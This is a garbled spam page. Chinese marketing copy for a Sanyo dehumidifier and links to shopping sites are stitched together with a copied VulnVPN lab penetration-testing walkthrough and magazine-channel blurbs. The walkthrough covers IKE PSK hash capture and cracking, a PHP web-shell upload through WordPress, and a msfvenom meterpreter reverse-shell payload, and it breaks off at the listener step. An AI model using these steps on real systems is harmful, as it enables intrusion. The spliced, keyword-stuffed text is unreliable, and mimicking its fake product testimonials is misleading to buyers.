close
- 熱賣 夏天節電看這裡【CHIMEI奇美】8吋DC直流3D立體擺頭循環扇(DF-08A0CD)聰明抗漲
- 特價 新居必買【永用牌】MIT台灣製造10吋室內窗型吸排風扇FC-1012小家電推薦
- 必買推薦 夏天節電看這裡【CAEDEN】Linea No1 經典耳罩式耳機(CAE10107)聰明抗漲
媽媽!我又流滿身汗了啦!!每次每到夏天,我都要面臨到汗流浹背的身體
只要沒有冷氣,馬上就要受不了了,如果體育課太陽在大點的話還會有中暑的可能。
我終於在網路上找到了秘密武器【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)希望買到的人可以變得很涼快
之前還有看到有人在泳池玩 象棋!哈哈這也太誇張了吧!
有聽過【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)?
相信應該很多人有聽過不少人買!!
熱門又多人買,應該是真的很不錯吧!!
猶豫了好久,發現這個網站送貨速度快而且還有折扣
有時候想買比較貴的禮物我都會看看有沒有折價券有時候滿多少折多少真的好優惠
時間跟金錢上的考量我這一次真的買了【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)!!!!!
↓↓↓限量折扣的優惠按鈕↓↓↓
在購物網購買,除了有詳細的介紹以外,更有保障!!所以我都很安心的在購物網買
【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)實體店面跟網路上的價格差好多!!還好逛街的時候沒有傻傻的直接買下去
而且很多時候加入會員以後會不定時送電子折價券,所以其實買到的價格很多時候都比 網站上的標價便宜
商品訊息功能:
- 品號:3929317
- 微電腦LED顯示
- 1~12小時定時設定裝置
- 滿水自動停機裝置
商品訊息描述:
商品訊息簡述:
品牌名稱 | |
---|---|
清淨機功能 |
|
除濕機機型 |
|
除濕機功能 |
|
特價
尺寸(mm):寬360/深210/高615
重量(kg):12.4
電壓(v):110
功率(w):265
保固期 | 1年保固期請參考三洋官網http://www.sanyo.com.tw/s1504/sanyo_s_service.asp小家電如需服務請自行送服務站維修 |
---|
【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)
討論,推薦,開箱,CP值,熱賣,團購,便宜,優惠,介紹,排行,精選,特價,周年慶,體驗,限時,消暑,電風扇,冷氣
快按下按鈕,立刻享折扣↓↓↓
另外在推薦我平時會使用的平台可以比較價格找便宜~~
寶貝用品購物網推薦 | ||
專門賣寶寶天然的清潔用品~~ | ||
適合給新手爸媽的嬰兒購物網,一應俱全! | ||
各大購物網快速連結 | ||
東森購物網 | 性質大多相同 建議每一家搜尋要購買的品項後 比對出能折價卷能扣最多的一家來消費 保養品、化妝品我比較常在momo購物網買,切記是"購物網"才有正品保障!! | |
森森購物網 | ||
udn買東西 | ||
MOMO購物網 | ||
瘋狂麥克 | 有時候新鮮貨我都在瘋狂麥克找,基本上想找的,瘋狂賣客都會賣~ | |
環境配置
需要首先下載VulnVPN軟件,下面是下載地址:
VulnVPN超省錢下載地址:http://www.rebootuser.com/wp-content/uploads/vulnvpn/VulnVPN.7z
VulnVPN客戶端文件:http://www.rebootuser.com/wp-content/uploads/vulnvpn/client.7z
在此之前我試過瞭Kali Linux的32位和64位版本來安裝,但是發現是行不通的(應該是系統版本問題),所以這裡我就選擇瞭使用Backtrack 5 r3 32位的版本安裝瞭一個虛擬機
首先,我們需要修改一下網絡環境,這裡我們打開虛擬網絡編輯器,然後把NAT IP地址改成192.168.0.0,如下圖所示:
我們將使用下面這臺Backtrack 5 r3 32位(以下簡稱BT5)的虛擬機作為攻擊機
現在我們新建一臺虛擬機然後把BT5安裝進去,安裝過程這裡我們就略過不講,對於FreeBufer來說肯定不是一件困難的事情
要使的我們的VulnVPN能夠正常工作,首先我們需要安裝下面三個包:
1、openswan
2、xl2tpd
3、ppp
安裝命令如下:
apt-get install openswan xl2tpd ppp
安裝完成之後,這樣攻擊需要的環境我們就搭好瞭。這時候我們啟動我們下載的VulnVPN,我們將完全不對其進行任何修改,不進行任何操作,我們就假裝這個VPN就是一個遠程VPN,真的遠程VPN我們怎麼可能碰得到呢對吧:)
然後我們需要在BT5攻擊機上設置一個靜態IP,做法也很簡單,隻需要打開/etc/network/interfaces文件,然後給eth0網口指定靜態的IP就可以瞭,內容為下:
auto eth0
iface eth0 inet dhcp
#iface eth0 inet static
address 192.168.0.11
network 192.168.0.0
netmask 255.255.255.0
broadcast 192.168.0.255
gateway 192.168.0.1
然後我們需要下載上面的VPN Client文件,然後解壓進行配置,具體的方式如下:
root@bt:~/vulnvpn/client# ls
ipsec.conf ipsec.secrets ppp start-vpn.shxl2tpd
root@bt:~/vulnvpn/client# cp ipsec.conf/etc/
root@bt:~/vulnvpn/client# cp ipsec.secrets/etc/
root@bt:~/vulnvpn/client# cpppp/options.l2tpd.client /etc/ppp/
root@bt:~/vulnvpn/client# cpxl2tpd/xl2tpd.conf /etc/xl2tpd/
開始進行滲透
我們使用以下命令來查看以下網絡的環境:
root@bt:~/vulnvpn# netdisocver -r192.168.0.0/24
對192.168.0.10主機進行TCP端口掃描
這裡我們使用神器nmap對上面發現的VulnVPN主機進行端口掃描(關於nmap的具體使用方法大傢可以點這裡:http://www.freebuf.com/articles/network/32302.html):
root@bt:~/vulnvpn# nmap -A 192.168.0.10
對192.168.0.10主機進行UDP端口掃描
root@bt:~/vulnvpn# nmap -sU 192.168.0.10
Note:以上掃描結果中的靶機中的81端口隻是預留為解決緊急狀況的,並非我們的攻擊目標和方向。
通過掃描,我們發現VulnVPN在500端口上運行瞭isakmp服務,關於這個服務的詳細信息,你可以點擊這裡查看:http://www.networksorcery.com/enp/protocol/isakmp.html
然後我們將對這個服務進行深入的信息收集,但是這個時候繼續使用nmap肯定是力不從心瞭,這裡我們使用ike-scan工具進行下一步的工作(ike-scan是一款基於命令行的工具,主要有主機發現,指紋識別等功能,可以用來測試IPSec VPN服務器)
然後我們使用該工具進行主機掃描:
root@bt:~/vulnvpn# ike-scan -M -A-Pike-hash -d 500 192.168.0.10
下面是關於該工具的幾個參數的解釋:
-M:縮進式輸出
-A:攻擊模式
-P 文件名 :指定寫入預共享key的文件名
-d:目標機器的UDP端口
這裡我們獲得的ike-hash文件中的預共享key可以使用psk-crack進行破解,破解過程如下:
root@bt:~/vulnvpn# psk-crack -d/pentest/passwords/wordlists/rockyou.txt ike-hash
很快我們就得到瞭密碼,密碼為123456,這裡我們就可以使用這個密碼連接VulnVPN瞭
編輯/etc/ipsec.secrets文件,然後將ENTER_PSK_HERE字段改為123456,命令如下:
root@bt:~/vulnvpn# nano /etc/ipsec.secrets
然後我們重啟一下ipsec服務:
root@bt:~# /etc/init.d/ipsec restart
然後我們可以用以下命令看一下已經啟動的服務:
root@bt:~# service –status-all
如果xl2tpd服務沒有啟動起來,這個時候還需要啟動一下:
root@bt:~# /etc/init.d/xl2tpd start
現在我們連接VulnVP必買推薦N:
root@bt:~# ipsec auto –up vpn
然後我們運行client文件中的start-vpn.sh文件,如果前面的配置沒有問題,這個時候我們應該可以看到建立瞭一個ppp0的接口:
root@bt:~/vulnvpn/client# sh start-vpn.sh
root@bt:~/vulnvpn/client# ifconfig
我們可以用以下命令看一下活動主機:
root@bt:~/vulnvpn# for ip in10.99.99.{1..255};
do ping -c 1 -t 1 $ip /dev/null echo “${ip}is up”;
done
我們知道,10.99.99.2是我們的VPN IP地址,而10.99.99.1則是VPN地址。
然後我們對10.99.99.1進行端口掃描:
root@bt:~/vulnvpn# nmap -A -p1-6553510.99.99.1
我們可以看到在10.99.99.1的80端口運行著HTTP服務,我們看下是個什麼東西
看起來沒什麼特殊的東西,沒關系,我們接著看10000端口:
我們首先分析這個HTTP服務。我們可以從上圖看到,這就是一個Apache HTTP服務安裝之後的默認頁面,沒什麼特殊的東西。我們需要對其進行深入的掃描分析才能得到更多的信息,這裡我們使用DirBuster對其進行進一步的掃描:
過程不過多描述,上結果:
我們從結果可以看出來,在HTTP服務上搭瞭一個WordPress。好奇心驅使我們看一下這個WP頁面:
http://10.99.99.1/wordpress/
這裡是一個主站的上傳頁面:
看到這裡,首先反應就是看看有沒有解析漏洞,這裡我們試一下傳一個php一句話(cmd.php):
WordPress默認的上傳路徑是/wp-content/uploads/,我們訪問看一下:
經過查看,我們發現我們上傳的PHP文件的路徑是rsjp/attachments/ 文件夾下,但是文件名改成瞭一串隨機字符串。我們可以通過這裡得到一個web shell:
得到shell就等於成功瞭大半,我們可以使用命令獲取一個meterpreter,當然,首先我們需要生成一個meterpreter php shell:
msfvenom -p php/meterpreter/reverse_tcpLHOST=10.99.99.2 LPORT=4444 -f raw meter.php
然後我們開啟一個handler進行監聽:
軟件信息化周刊
比特軟件信息化周刊提供以數據庫、操作系統和管理軟件為重點的全面軟件信息化產業熱點、應用方案推薦、實用技巧分享等。以最新的軟件資訊,最新的軟件技巧,最新的軟件與服務業內動態來為IT用戶找到軟捷徑。
商務辦公周刊
比特商務周刊是一個及行業資訊、深度分析、企業導購等為一體的綜合性周刊。其中,與中國計量科學研究院合力打造的比特實驗室可以為商業用戶提供最權威的采購指南。是企業用戶不可缺少的智選周刊!
網絡周刊服務器周刊
比特網絡周刊向企業網管員以及網絡技術和產品使用者提供關於網絡產業動態、技術熱點、組網、建網、網絡管理、網絡運維等最新技術和實用技巧,幫助網管答疑解惑,成為網管好幫手。
服務器周刊
比特服務器周刊作為比特網的重點頻道之一,主要關註x86服務器,RISC架構服務器以及高性能計算機行業的產品及發展動態。通過最獨到的編輯觀點和業界動態分析,讓您第一時間瞭解服務器行業的趨勢。
存儲周刊安全周刊
比特存儲周刊長期以來,為讀者提供企業存儲領域高質量的原創內容,及時、全面的資訊、技術、方案以及案例文章,力求成為業界領先的存儲媒體。比特存儲周刊始終致力於用戶的企業信息化建設、存儲業務、數據保護與容災構建以及數據管理部署等方面服務。
安全周刊
比特安全周刊通過專業的信息安全內容建設,為企業級用戶打造最具商業價值的信息溝通平臺,並為安全廠商提供多層面、多維度的媒體宣傳手段。與其他同類網站信息安全內容相比,比特安全周刊運作模式更加獨立,對信息安全界的動態新聞更新更快。
新聞中心熱點推薦雲計算周刊
新聞中心熱點推薦
新聞中心以獨特視角精選一周內最具影響力的行業重大事件或圈內精彩故事,為企業級用戶打造重點突出,可讀性強,商業價值高的信息共享平臺;同時為互聯網、IT業界及通信廠商提供一條精準快捷,滲透力強,覆蓋面廣的媒體傳播途徑。
雲計算周刊
比特雲計算周刊關註雲計算產業熱點技術應用與趨勢發展,全方位報道雲計算領域最新動態。為用戶與企業架設起溝通交流平臺。包括IaaS、PaaS、SaaS各種不同的服務類型以及相關的安全與管理內容介紹。
CIO俱樂部周刊IT專傢網
CIO俱樂部周刊
比特CIO俱樂部周刊以大量高端CIO沙龍或專題研討會以及對明星CIO的深入采訪為依托,匯聚中國500強CIO的集體智慧。旨為中國傑出的CIO提供一個良好的互融互通 、促進交流的平臺,並持續提供豐富的資訊和服務,探討信息化建設,推動中國信息化發展引領CIO未來職業發展。
IT專傢網
IT專傢新聞郵件長期以來,以定向、分眾、整合的商業模式,為企業IT專業人士以及IT系統采購決策者提供高質量的原創內容,包括IT新聞、評論、專傢答疑、技巧和白皮書。此外,IT專傢網還為讀者提供包括咨詢、社區、論壇、線下會議、讀者沙龍等多種服務。
X周刊
X周刊是一份IT人的技術娛樂周刊,給用戶實時傳遞I最新T資訊、IT段子、技術技巧、暢銷書籍,同時用戶還能參與我們推薦的互動遊戲,給廣大的IT技術人士忙碌工作之餘帶來輕松休閑一刻。
【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)怎麼買比較便宜?使用心得【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)推薦【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)開箱文#GOODS_NAME#心得分享【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)哪邊買必較便宜?兒童教材婦幼玩具手推車#GOODS_NAME#嬰幼兒推車#GOODS_NAME#汽座奶粉【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)尿布奶瓶新手爸媽【台灣三洋 SANLUX】11L除濕機(SDH-1143LA)怎麼省錢
您或許有興趣的商品:
全站熱搜
留言列表